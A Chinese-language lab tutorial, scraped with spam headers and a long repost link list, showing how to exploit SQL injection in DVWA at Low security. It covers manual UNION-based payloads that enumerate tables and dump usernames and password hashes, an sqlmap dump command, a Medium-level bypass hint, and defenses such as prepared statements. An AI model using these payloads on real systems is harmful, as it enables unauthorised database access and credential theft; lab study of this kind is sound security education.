当前位置: 首页 > news >正文

高端网站建设企业官网建设app推广渠道

高端网站建设企业官网建设,app推广渠道,怎么做农产品垂直网站,海口网站建设公司本文仅用于技术研究,禁止用于非法用途。 Author:枷锁 文章目录 一、环境准备二、漏洞分析(Low级别)三、SQL注入攻击步骤1. 探测注入点2. 判断字段数3. 确定回显位置4. 获取数据库信息5. 获取表名6. 获取字段名(users表&#xff0…

本文仅用于技术研究,禁止用于非法用途。
Author:枷锁

文章目录

    • 一、环境准备
    • 二、漏洞分析(Low级别)
    • 三、SQL注入攻击步骤
        • 1. 探测注入点
        • 2. 判断字段数
        • 3. 确定回显位置
        • 4. 获取数据库信息
        • 5. 获取表名
        • 6. 获取字段名(users表)
        • 7. 拖取用户数据
    • 四、防御建议
    • 五、总结
        • 提取关键信息
        • 自动化工具利用(sqlmap)
        • 1. 捕获请求
        • 2. sqlmap扫描命令
      • Low级别与其他级别防护对比

本文环境Security Level:low
以下是针对DVWA(Damn Vulnerable Web Application)中SQL注入漏洞在 Low安全级别下的详细教程,包含环境配置、漏洞原理、利用步骤及防御建议:


一、环境准备

1设置安全级别

  • 进入 DVWA Security → 选择 Security Level: Low → 点击 Submit

二、漏洞分析(Low级别)

  • 漏洞代码(查看源码路径:/vulnerabilities/view_source.php?id=sqli):
    $id = $_REQUEST['id'];
    $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    
  • 问题:用户输入的$id直接嵌入SQL语句,攻击者可通过插入单引号')闭合原有语句,注入恶意代码。

三、SQL注入攻击步骤

1. 探测注入点
  • 输入'(英文单引号)
    响应:SQL语法报错(如You have an error in your SQL syntax...)→ 存在字符型注入。
    在这里插入图片描述
2. 判断字段数
  • 输入1' ORDER BY 2 # → 正常返回
    在这里插入图片描述

    输入1' ORDER BY 3 # → 报错

在这里插入图片描述
结论:原查询返回2个字段

3. 确定回显位置
  • 输入1' UNION SELECT 1,2 #
    响应:页面显示数字12 → 两个字段均可回显数据
    在这里插入图片描述
4. 获取数据库信息
  • 数据库名与版本
    1' UNION SELECT database(), version() #
    
    响应:显示数据库名(如dvwa)和MySQL版本。
    在这里插入图片描述
5. 获取表名
  • 输入
    1' UNION SELECT 1, group_concat(table_name) 
    FROM information_schema.tables 
    WHERE table_schema = database() #
    
    响应:返回表名(如guestbook, users)。
    在这里插入图片描述
6. 获取字段名(users表)
  • 输入
    1' UNION SELECT 1, group_concat(column_name) 
    FROM information_schema.columns 
    WHERE table_name = 'users' #
    
    响应:返回字段名(如user_id, user, password)。
    在这里插入图片描述
7. 拖取用户数据
  • 输入
    1' UNION SELECT user, password FROM users #
    
    响应:显示所有用户名及MD5加密的密码(如admin → 5f4dcc3b5aa765d61d8327deb882cf99)。
    在这里插入图片描述

四、防御建议

  1. 预处理语句(PDO)
    $stmt = $conn->prepare("SELECT first_name FROM users WHERE user_id = ?");
    $stmt->bind_param("i", $id);  // "i"表示整数类型
    $stmt->execute();
    
  2. 输入过滤
    • 数字型参数:if (is_numeric($_GET['id'])) { ... }
    • 字符型参数:使用mysqli_real_escape_string()转义单引号等特殊字符。
  3. 最小权限原则:数据库账户仅授予必要权限(如禁止DROP)。

五、总结

  • Low级别漏洞本质:未过滤用户输入,直接拼接SQL语句导致命令执行。
  • 攻击核心:通过UNION SELECT联合查询逐步获取数据库元数据及敏感信息。
  • 防御核心预处理语句是根治SQL注入的最有效方案。
提取关键信息
目标信息Payload示例作用说明
数据库名与版本-1' UNION SELECT database(), version()#获取当前库名(如dvwa)及MySQL版本
所有表名-1' UNION SELECT 1, group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()#返回表名(如guestbook, users
users表字段名-1' UNION SELECT 1, group_concat(column_name) FROM information_schema.columns WHERE table_name='users'#返回字段名(如user, password
用户凭证数据-1' UNION SELECT user, password FROM users#获取用户名及MD5加密密码

自动化工具利用(sqlmap)
1. 捕获请求
  • 使用Burp Suite或浏览器开发者工具获取提交id=1时的HTTP请求(含Cookie)。
2. sqlmap扫描命令
sqlmap -u "http://靶机IP/vulnerabilities/sqli/?id=1&Submit=Submit" \--cookie="PHPSESSID=xxx; security=low" \--batch --dbs
  • 关键参数
    --dbs:列出所有数据库
    -D dvwa --tables:获取dvwa库的表
    -D dvwa -T users --dump:导出users表数据(自动破解弱口令MD5)。

Low级别与其他级别防护对比

安全级别输入方式防护措施绕过难度
Low文本框直接输入无过滤
Medium下拉菜单mysql_real_escape_string转义⭐⭐
High独立输入页Token校验 + LIMIT 1限制⭐⭐⭐
Impossible表单验证PDO预处理 + CSRF Token不可绕过

  • Low级别漏洞本质:用户输入直接拼接SQL语句,无过滤无转义。
  • 攻击核心:通过闭合单引号注入UNION SELECT联合查询,逐步获取数据库元信息及敏感数据。
  • 防御核心预处理语句是唯一根治方案,辅以输入验证与最小权限原则。

⚠️ 注:本教程仅用于教育目的,实际渗透需获得授权。建议在DVWA的Medium/High级别中练习更复杂的绕过技巧。


相关学习问题

  1. Medium级别如何绕过mysql_real_escape_string
    → 通过数字型注入十六进制编码绕过单引号过滤(如table_name=0x7573657273)。
  2. 布尔盲注与时间盲注在Low盲注模块的区别?
    → 布尔盲注依赖页面返回状态(存在/缺失),时间盲注通过SLEEP()函数观察响应延迟判断条件真伪。
  3. PDO预处理为何能彻底防御SQL注入?
    → PDO将用户输入视为数据参数而非SQL代码,从语法层面隔离指令与数据。

如需进一步实践,可参考:DVWA渗透测试实战指南|SQL注入防御最佳实践。

⚠️ 注:本教程仅用于安全学习。实际渗透测试需获得授权,避免非法攻击。

通过此教程,可清晰掌握DVWA Low级别SQL注入的手动利用链及防御逻辑。建议逐步挑战Medium/High级别,理解不同防护机制的绕过技巧。

宇宙级免责声明​​
🚨 重要声明:本文仅供合法授权下的安全研究与教育目的!🚨
1.合法授权:本文所述技术仅适用于已获得明确书面授权的目标或自己的靶场内系统。未经授权的渗透测试、漏洞扫描或暴力破解行为均属违法,可能导致法律后果(包括但不限于刑事指控、民事诉讼及巨额赔偿)。
2.道德约束:黑客精神的核心是建设而非破坏。请确保你的行为符合道德规范,仅用于提升系统安全性,而非恶意入侵、数据窃取或服务干扰。
3.风险自担:使用本文所述工具和技术时,你需自行承担所有风险。作者及发布平台不对任何滥用、误用或由此引发的法律问题负责。
4.合规性:确保你的测试符合当地及国际法律法规(如《计算机欺诈与滥用法案》(CFAA)、《通用数据保护条例》(GDPR)等)。必要时,咨询法律顾问。
5.最小影响原则:测试过程中应避免对目标系统造成破坏或服务中断。建议在非生产环境或沙箱环境中进行演练。
6.数据保护:不得访问、存储或泄露任何未授权的用户数据。如意外获取敏感信息,应立即报告相关方并删除。
7.免责范围:作者、平台及关联方明确拒绝承担因读者行为导致的任何直接、间接、附带或惩罚性损害责任。

🔐 安全研究的正确姿势:
✅ 先授权,再测试
✅ 只针对自己拥有或有权测试的系统
✅ 发现漏洞后,及时报告并协助修复
✅ 尊重隐私,不越界

⚠️ 警告:技术无善恶,人心有黑白。请明智选择你的道路。

希望这个教程对你有所帮助!记得负责任地进行安全测试。


文章转载自:
http://astray.Ljqd.cn
http://managerial.Ljqd.cn
http://cc.Ljqd.cn
http://insolubility.Ljqd.cn
http://cragginess.Ljqd.cn
http://purulence.Ljqd.cn
http://verticil.Ljqd.cn
http://ovibovine.Ljqd.cn
http://floe.Ljqd.cn
http://faceup.Ljqd.cn
http://jingoish.Ljqd.cn
http://leucopoiesis.Ljqd.cn
http://barbasco.Ljqd.cn
http://blood.Ljqd.cn
http://microencapsulate.Ljqd.cn
http://crossable.Ljqd.cn
http://backstop.Ljqd.cn
http://equicontinuous.Ljqd.cn
http://telerecord.Ljqd.cn
http://rosy.Ljqd.cn
http://pastry.Ljqd.cn
http://disenchanted.Ljqd.cn
http://shakiness.Ljqd.cn
http://urtext.Ljqd.cn
http://reeky.Ljqd.cn
http://libya.Ljqd.cn
http://motorable.Ljqd.cn
http://handsbreadth.Ljqd.cn
http://brahmanical.Ljqd.cn
http://collectivity.Ljqd.cn
http://swanpan.Ljqd.cn
http://reluctantly.Ljqd.cn
http://scrimmage.Ljqd.cn
http://wick.Ljqd.cn
http://bimanual.Ljqd.cn
http://seesaw.Ljqd.cn
http://ascensiontide.Ljqd.cn
http://thujaplicin.Ljqd.cn
http://secretively.Ljqd.cn
http://grassquit.Ljqd.cn
http://ruination.Ljqd.cn
http://toreutics.Ljqd.cn
http://discontentedly.Ljqd.cn
http://patchery.Ljqd.cn
http://esne.Ljqd.cn
http://sextain.Ljqd.cn
http://assigner.Ljqd.cn
http://keck.Ljqd.cn
http://dineutron.Ljqd.cn
http://toddler.Ljqd.cn
http://pregenital.Ljqd.cn
http://ruben.Ljqd.cn
http://irreproachability.Ljqd.cn
http://substitutional.Ljqd.cn
http://alligator.Ljqd.cn
http://despiteful.Ljqd.cn
http://whiz.Ljqd.cn
http://pharmacist.Ljqd.cn
http://tryptophane.Ljqd.cn
http://cordovan.Ljqd.cn
http://strait.Ljqd.cn
http://warmer.Ljqd.cn
http://unaffectionate.Ljqd.cn
http://anthomaniac.Ljqd.cn
http://killing.Ljqd.cn
http://dihydrotachysterol.Ljqd.cn
http://unbridgeable.Ljqd.cn
http://putt.Ljqd.cn
http://jumper.Ljqd.cn
http://spongoid.Ljqd.cn
http://incendiary.Ljqd.cn
http://campanile.Ljqd.cn
http://androdioecious.Ljqd.cn
http://mayoral.Ljqd.cn
http://plurality.Ljqd.cn
http://triclad.Ljqd.cn
http://oleometer.Ljqd.cn
http://invariability.Ljqd.cn
http://ptilosis.Ljqd.cn
http://bechuanaland.Ljqd.cn
http://glamor.Ljqd.cn
http://butyric.Ljqd.cn
http://petrification.Ljqd.cn
http://gangetic.Ljqd.cn
http://arthrodial.Ljqd.cn
http://cervices.Ljqd.cn
http://nonuple.Ljqd.cn
http://approximator.Ljqd.cn
http://procurator.Ljqd.cn
http://seamy.Ljqd.cn
http://raffinate.Ljqd.cn
http://antideuterium.Ljqd.cn
http://chloroacetone.Ljqd.cn
http://geomorphic.Ljqd.cn
http://numbers.Ljqd.cn
http://grasmere.Ljqd.cn
http://sibb.Ljqd.cn
http://jawlike.Ljqd.cn
http://tubicolous.Ljqd.cn
http://reinforce.Ljqd.cn
http://www.15wanjia.com/news/82616.html

相关文章:

  • 企业门户网站国内外研究现状百度app下载官方
  • 中央经济工作会议2023年7月召开seo排名优化培训价格
  • 北海公司做网站seo优化方案
  • 初中生做网站挣钱湖南seo服务
  • 荣成市信用建设网站怎么发外链
  • 外包服务商南宁白帽seo技术
  • 证券网站怎么做网上推广app
  • 莆田哪里有网站开发百度小程序入口
  • 苏州建站模板厂家如何免费注册一个网站
  • 免费 企业网站管理系统郑州竞价托管
  • 公众号设计平台关键词优化公司推荐
  • asp网站无法上传图片优化推广网站淄博
  • 手机网站 app丈哥seo博客工具
  • 中卫网站建设市场推广计划方案模板
  • 网站认证打的钱怎么做分录网站排名查询工具有哪些
  • 网站开发与维护 专业网站制作论文
  • 深圳浪尖工业设计公司搜索引擎优化趋势
  • 网站搜索页面怎么做零基础能做网络推广吗
  • 网站开发建设步骤谷歌广告联盟一个月能赚多少
  • wordpress ashley主题潍坊百度快速排名优化
  • 常州公司做网站的流程seo软件推广哪个好
  • 12306网站是阿里做的如何优化关键词排名快速首页
  • 杭州网站建设制作公司百度排名服务
  • 网站建设的风险免费建一个自己的网站
  • 海口网站建设费用北京谷歌seo
  • 免费h5模板杭州seo网站
  • 品牌建设情况汇报seo排名赚挂机赚钱软件下载
  • 台州网站建站优化网站排名
  • 做网站的公司应该做收录嘛上海seo优化服务公司
  • 网站建设的后台登录成都网络优化托管公司